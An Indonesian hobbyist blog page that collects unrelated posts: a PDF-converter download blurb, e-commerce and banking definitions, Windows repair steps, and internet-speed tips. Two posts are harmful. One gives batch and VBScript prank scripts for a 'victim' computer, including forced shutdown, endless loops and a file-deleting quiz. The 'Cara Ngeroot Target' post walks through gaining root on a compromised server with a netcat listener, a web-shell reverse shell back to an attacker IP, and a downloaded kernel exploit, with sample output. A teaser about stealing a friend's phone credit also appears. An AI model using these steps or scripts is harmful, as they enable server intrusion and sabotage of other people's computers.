Latest Entries »


Simpo PDF to Word v3.2.1 ML 20110106

The Simpo PDF to Word application was designed to be a professional converter for batch converting PDF documents to Microsoft Office Word files. This product amazingly reserves the layout, text, images of the original PDF document.

Moreover, Simpo PDF to Word is a standalone application, so you could run this program independently and needn’t extra install Microsoft Word, Adobe Acrobat or Acrobat Reader.

Simpo PDF to Word provides you an intuitive interface, which is popular for both experts and beginners. Just two clicks: Import files, click “convert” and done!

Key features of “Simpo PDF to Word”:

Easy-to-use Interface:
· Like all Simpo PDF products, Simpo PDF to Word provides you an intuitive interface, which is popular for both experts and beginners. Just two clicks: Import files, click “convert” and done!

100% Preserve Layouts:
· All layouts, text, images and other contents in PDF file are amazingly preserved after it’s converted to word document.

High Speed Conversion:
· Simpo PDF to Word only takes seconds, and even faster, to convert a huge pdf file to .doc without any quality lost. What’s more, it supports batch conversion to save your time.

Advanced Settings:
· There are two options for the output. Your final Word files could be plain text (no images) or keep all layouts.

Standalone Application:
· Simpo PDF to Word is a standalone application, which means you needn’t extra install Microsoft Office Word, Adobe Acrobat or Reader to convert any PDF files.

Download

MEDIAFIRE


lumayan buat nambah pengetahuan nieh ada e-book cisco langsung di sedot disini aja

MEDIAFIRE

Cara Mencuri Pulsa Kawan


Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya …..

Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata. Postingan ini diambil dari forum hackcenter …. View full article »

E-Commerce


Definisi E-Commerce

Berikut ini beberapa definisi mengenai electronic commerce yang mungkin dapat membuka gambaran lebih jauh mengenai apa yang dimaksud dengan electronic commerce.

“Pada saat Internet memberdayakan seluruh penduduk dan mendemokratisasikan kehidupan sosial (societies), itu juga akan mengubah paradigma ekonomi klasik. Model baru interaksi komersial berkembang sewaktu kalangan bisnis dan kustomer/pelanggan-pelanggannya berpartisipasi dalam suatu pasar elektronik dan mencapai manfaat bersama. GII (Global Information Infrastructur) secara potensial telah mengubah dengan cepat bidang komersil dan bidang-bidang lainnya dengan mengurangi biaya secara dramatis dan memberi suatu sarana baru untuk melakukan transaksi komersial. Internet bakal mengubah pemasaran retail secara revolusioner. Komersialisasi di Internet bakal mencapai 10 milyar dollar samapi akhir abad ini. ” (U.S. Executive Office of the President, 1997)

“Elektronic Commerce adalah transaksi komersial dari jasa dalam format elektronik” (Transatlantic Business Dialogue Electronic Commerce White Paper, 1997)
“Electronic Commerce merujuk secara umum kepada semua bentuk transaksi yang berkaitan dengan aktifitas komersial, baik organisasi maupun individual, yang berdasarkan pada pemrosesan dan transmisi data yang digitalisasikan, termasuk teks, suara, dan gambar” (OECD, 1997) View full article »


Diluar sana memang byk Virus bergentayangan dgn berbagai macam varian
Disini ane mau share Trik bagaimana supaya Flashdisk agan2 bebas dari virus

-Ketika USB dicolokan ke Komputer,abaikan ato cancel autuplaynya
ato sebelumnya matikan Autoplay,caranya:
RUN→GPEDIT.MSC→User Config→Adm Templates→System→Dobel klik/klik kanan trs properties pd Turn off Autoplay→sebaiknya pilih Alldrives View full article »


Berikut tahapan2 sesuai dengan jenis kesalahan.

1. Memperbaiki Instalasi (Repair Install)

Jika Windows XP Anda rusak (corrupted) dimana Anda tidak mempunyai sistem operasi lain untuk booting,
Anda dapat melakukan perbaikan instalasi (Repair Install) yang bekerja sebagaimana setting (pengaturan)
yang awal.

– Pastikan Anda mempunyai kunci (key) Windows XP yang valid.
– Keseluruhan proses akan memakan waktu kurang lebih 1/2 atau 1 jam, tergantung spek komputer Anda.
– Jika Anda dimintai password administrator, sebaiknya Anda memilih opsi perbaikan (repair) yang kedua,
bukan yang pertama.
– Masukkan CD Windows XP Anda dan lakukan booting dari CD tersebut.
– Ketika sudah muncul opsi perbaikan kedua R=Repair, tekan tombol R
Ini akan memulai perbaikan.
– Tekan tombol F8 untuk menyetujui proses selanjutnya “I Agree at the Licensing Agreement”
– Tekan tombol R saat direktori tempat Windows XP Anda terinstal. Biasanya C:\WINDOWS
Selanjutnya akan dilakukan pengecekan drive C: dan mulai menyalin file-file.
Dan secara otomatis restart jika diperlukan. Biarkan CD Anda dalam drivenya.
– Berikutnya Anda akan melihat sebuah gambar “progress bar” yang merupakan bagian dari perbaikan,
dia nampak seperti instalasi XP normal biasanya, meliputi “Collecting Information, Dynamic Update,
Preparing Installation, Installing Windows, Finalizing Installation”.
– Ketika ditanya, klik tombol Next
– Ketika ditanya untuk memasukkan kunci, masukkan kunci (key) Windows XP Anda yang valid.
– Normalnya Anda menginginkan tetap berada dalam nama Domain atau Workgroup yang sama.
– Komputer akan restart.
– Kemudian Anda akan mempunyai layar yang sama sebagaimana pengaktifan sistem ketika instalasi normal.
– Register jika Anda menginginkannya (biasanya tidak diperlukan).
– Selesai

Sekarang Anda bisa log in dengan account Anda yang sudah ada. View full article »


Pada kali ini, saya akan share tujuh tips dan trik untuk mempercepat akses internet anda untuk berbagai platform dari dial up sampai broadband.

Kebutuhan akan akses internet sudah mulai menjamur di Indonesia. Tetapi dengan kualitas ISP Indonesia yang begitu-begitu saja membuat kita sedikit jengkel dan kesal. Hanya iklan saja yang dibesar besarkan tetapi kualitas dikecil-kecilkan jadi curhat nih. Pasti banyak netter-netter yang pernah erasakan yang namanya lemot, lambat, keong, RTO, putus-putus, lag, DC, apa lah sebutan lainnnya. Nah pada artikel kali ini saya akan mencoba share 7 cara untuk meningkatkan koneksi internet anda. View full article »


Sebelumnya saya dan keluarga minta maaf atas di sumber …
Tapi nggak di kaskus …

Sekarang langsung to the point, nah saya akan memberikan trik – trik notepad …
Akan tetapi, saya cuman dapat memberikan 10 trik, langsung ke …

Trik :

1. Membuat message box yang selalu keluar :
copy:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

Simpan dengan format *.bat
Yang ini hanya bisa di close mungkin dengan process hacker gan, sama taskmngr nggak bisa …

2. Bikin komputer korban shutdown dan message box keluar
copy:

@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”

Simpan dengan format *.bat juga …

3. Membuat Capslock terus menyala
copy:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Simpan dengan format *.vbs, bisa di close sama Task Manager atau PH

4. Membuka dan menutup CD/DVD komputer korban
copy:

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan dengan format *.vbs juga ya gan!

5. Membuat vbscript terus muncul
copy:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Simpan dengan format *.vbs, mungkin sama taskmngr bisa di close …

6. Terus – menerus menekan tombol “backspace”
copy:

MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Simpan dengan format *.vbs, pasti yang berformat *vbs bisa di kill sama taskmngr

7. Otomatis menulis “Lu jelek banget sih” di notepad atau di word
copy:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop

Simpan dengan format *.vbs, sendkeysnya bisa di ganti …

8. Terus – menerus membuka notepad
copy:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan format *.bat, bisa juga di ganti apa yang mau di bukanya, asalkan tau di mana disimpennya …

9. Sama dengan trik nomor tujuh, tapi berbeda khas
copy:

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu ”
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k ”
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! ”

Ganti sendkeysnya, dan simpan dengan format *.vbs …

10. Membuat kuis
copy:

@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan format *.bat …

Sekian triknya, kasih rate ya gan!!!

Kalo iso cendol !!!


Bank adalah suatu lembaga yang berperan sebagai perantara keuangan (financial intermediary) antara pihak-pihak yang memiliki kelebihan dana (surplus unit) dengan pihak-pihak yang memerlukan dana (deficit unit). Penyaluran kredit merupakan kegiatan usaha yang mendominasi pengalokasian dana bank. Penggunaan dana untuk menyalurkan kredit ini mencapai 70% – 80% dari volume usaha bank. Oleh karena itu, sumber utama pendapatan bank berasal dari kegiatan penyaluran kredit dalam bentuk bunga. Kredit yang diberikan oleh bank dapat berbentuk kredit jangka pendek, jangka menengah ataupun jangka panjang. Syarat kredit jangka pendek pada umumnya lebih lunak dibandingkan kredit jangka panjang. Hal ini disebakan oleh karena kredit jangka panjang pada umumnya meliputi jumlah dana yang besar dan terikat untuk jangka waktu yang panjang. Dalam melakukan proses penyeleksian permohonan kredit, bank menggunakan The Five C’s of Credit Analysis sebagai berikut: View full article »

Cara Ngeroot Target


Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.

Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:

  1. Sediakan server / pc untuk menjalankan Netcat
  2. Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode  (OFF)
  3. Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
  4. Sediakan Netcat (NC) untuk menerima connection dari backconnect
  5. Sediakan local root exploit yang sesuai dengan kernel target

Oke, kita mulai beraksi

Asumsikan bahwa:

IPHOSTSERVER ANDA = 100.100.100.100

PORT SERVER NETCAT ANDA: 10000

Langkah pertama cara ngeroot:

Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.

Commandnya sangat sederhana: netcat -n -l -v -p PORT

Contoh: netcat -n -l -v -p 10000

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …

Langkah kedua cara ngeroot:

Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,

Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT

Contoh:

perl backconnect.txt 100.100.100.100 10000

Langkah ketiga cara ngeroot:

Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.

Contoh:

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)

Langkah ke-empat cara ngeroot:

Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.

Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.

Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.

Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya :)

Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).

Kemudian kita jalankan perintahnya: ./raptor

w00t: uid=0(root) gid=0(root) groups=0(root)

whoami

uid=0(root) gid=0(root) groups=0(root)

Buzz, selamat anda sudah mendapatkan root.

Klo sudah dapat, dibagi bagi ya.

  • Love Indonesia

  • BLOG PEMULA

    Review https://theoncom.wordpress.com on alexa.com
  • [ Back to top ]